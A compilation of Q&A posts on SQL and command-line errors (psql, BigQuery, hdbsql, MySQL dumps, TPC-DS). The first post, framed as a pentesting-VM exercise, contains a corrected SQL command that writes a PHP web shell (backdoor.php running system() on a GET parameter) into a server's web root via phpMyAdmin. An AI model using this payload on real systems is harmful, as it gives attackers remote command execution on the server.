php code injection in phpmyadmin - sql

I'm toying with some pentesting VMs, and I'm trying a shell upload in phpmyadmin.
The tutorial, I'm trying to follow is http://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/
The question I have however is pure SQL - the command I'm trying to use:
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”
is producing the following error:
Error
There seems to be an error in your SQL query. The MySQL server error output below, if there is any, may also help you in diagnosing the problem
ERROR: Unknown Punctuation String # 9
STR: <?
SQL: SELECT “<?php system($_GET[‘cmd’]);SELECT “<?php system($_GET[‘cmd’]);SELECT “<?php system($_GET[‘cmd’]);
SQL query: Documentation
SELECT “<?php system($_GET[‘cmd’]);
MySQL said: Documentation
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?php system($_GET[‘cmd’])' at line 1
Any ideas how could I format it to be accepted?

The quotes were copied dirty. Replace them after pasting the snippet:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php";

Related

How to fix syntax error at or near "psql" in psql ubuntu

I am entirely new to psql and not particularly familiar with some terms. I am following instructions on an ETL process for mimic-in the link here: https://github.com/chichukw/mimic-omop/blob/master/README-run-etl.md. When I run this code, it shows no output but this error:
syntax error at or near "psql"
I have tried adding semicolon, removing the psql part and removing the quotes and dollar sign but I still get this syntax error on the first character regardless.
psql "$MIMIC" postgres_create_mimic_id.sql;
I expect concept ids to be created after running this code on the server using the jupyter terminal.
The only way I can think of how you could get that output/error is if you did this:
[root#foo /]# psql
psql (11.5)
Type "help" for help.
postgres=# psql "$MIMIC" postgres_create_mimic_id.sql;
ERROR: syntax error at or near "psql"
LINE 1: psql "$MIMIC" postgres_create_mimic_id.sql;
^
postgres=#
Instead, I think you should be doing this:
[root#foo /]# export MIMIC='host=localhost dbname=postgres user=postgres options=--search_path=mimiciii'
[root#foo /]# psql "$MIMIC" -f postgres_create_mimic_id.sql;
Disclosure: I am an EnterpriseDB (EDB) employee

Bigquery Command Line Query with ">" not working

Initially took me a while to figure out that ">" causes an issue in cmd and learned from one of the answers that escaping with ^ works. So after changing my query to below format it works fine.
bq query --use_legacy_sql=false --destination_table= (SELECT * FROM `dataset_ID.table_nm` GROUP BY AAA HAVING SUM(BBB)^>0 )
But now I am trying to run the same query through a file.
bq query --use_legacy_sql=false --destination_table= --flagfile="Y:query.sql"
However above it gives me an error if I have "^>".
Error in query string: Error processing job Syntax error: Unexpected ">" at [1:227]
If I don't have "^" in front of the ">" the query doesn't return an error but the result is empty..
Hoping someone could help out with the issue above.
Thanks!

Using sql within shell script

I am currently trying to integrate an sql statement into a shell script, But facing major syntax issue:
My statement in the script:
su - <sid>adm -c 'hdbsql -U SYSTEM export "'SCHEMA'"."'*'" as binary into "'Export Location'" with reconfigure'
I get the following error:
* 257: sql syntax error: incorrect syntax near "*": line 1 col 16 (at pos 16) SQLSTATE: HY000
Would really appreciate if anyone could help me with this.
Thanks and Regards,
AK
Your command line doesn't make much sense to me. It starts with
su - <sid>adm
which means that you are redirecting the contents of the file "sid" into "su" and then redirecting the result of that operation into the file "adm".
Second problem is that in the command you are giving to adm, the single quotes end right before the "" which means, that the "" will get interpreted by the shell as a file glob:
-c 'hdbsql -U SYSTEM export "'SCHEMA'"."'*'" as binary into "'Export Location'" with reconfigure'
You'll need to escape those single quotes like this: "\'".
But I think your problem solving approach is not good. Try to reduce to problem and only then start adding additional things to it. So first try to execute the SQL statement from the "hdbsql" shell. Does it work?
$ hdbsql
> YOUR SQL STATEMENT HERE
Once that works, try to execute the SQL statement from the unix shell as a user:
$ hdbsql -U SYSTEM export ...
Once that works, try to execute it via su
$ su - ...

MySQL Dump Error 1064 (42000)

I'm having a MySQL dump from Version 4.0.21. I converted it to UTF-8 to fit with the special characters such as (Ü, ü, Ä, ä, Ö, ö, ß). Now I have to import it into the latest MySQL Version 5.5.36. All data have been imported but an error occurred at the end.
ERROR 1064 (42000) at line 80769: You have an error in your SQL syntax...use near '' at line 1
The empty string and the line numbers are confusing me. Importing with phpMyAdmin results the same as command line does, with the command:
mysql -u root -p bugtracker < E:\mantisUTF.dump
The import with the original dump from Version 4.0.21 is working perfect but without the above mentioned special characters.
First Lines of the dump file:
-- MySQL dump 9.11
--
-- Host: localhost Database: Mantis
-- ------------------------------------------------------
-- Server version 4.0.21-debug
--
-- Table structure for table `mantis_bug_file_table`
--
Last Lines (80768 & 80769):
INSERT INTO mantis_user_table VALUES (57,'fullName','firstName lastName','emailAdress','dd1875c93e8f17a24ebaf9c902b7165a','2014-01-29 13:43:21','2014-03-26 13:22:47',1,0,55,14,0,0,'1b886436b0c62598ab66e40ae89f0c016dc5777ebb601a73f2a07536281113ae'
Thanks in advance.
Relax
By rechecking my question i found the problem. The problem was a missing ')' at the end of the dump file.
Last line:
INSERT INTO mantis_user_table VALUES (57,'fullName','firstName lastName','emailAdress','dd1875c93e8f17a24ebaf9c902b7165a','2014-01-29 13:43:21','2014-03-26 13:22:47',1,0,55,14,0,0,'1b886436b0c62598ab66e40ae89f0c016dc5777ebb601a73f2a07536281113ae')

How to generate executable TPC-DS queries?

I have downloaded the DSGEN tool from the TPC-DS web site and already generated the tables and loaded the data into Oracle XE.
I am using the following command to generate the SQL statements :
dsqgen -input ..\query_templates\templates.lst -directory ..\query_templates -dialect oracle -scale 1
However, No matter how I adjust the command I always get this error message :
ERROR: A query template list must be supplied using the INPUT option
Can anybody help?
Apparently you need to use / rather than - for the flags for the Windows executable:
dsqgen /input ..\query_templates\templates.lst /directory ..\query_templates
/dialect oracle /scale 1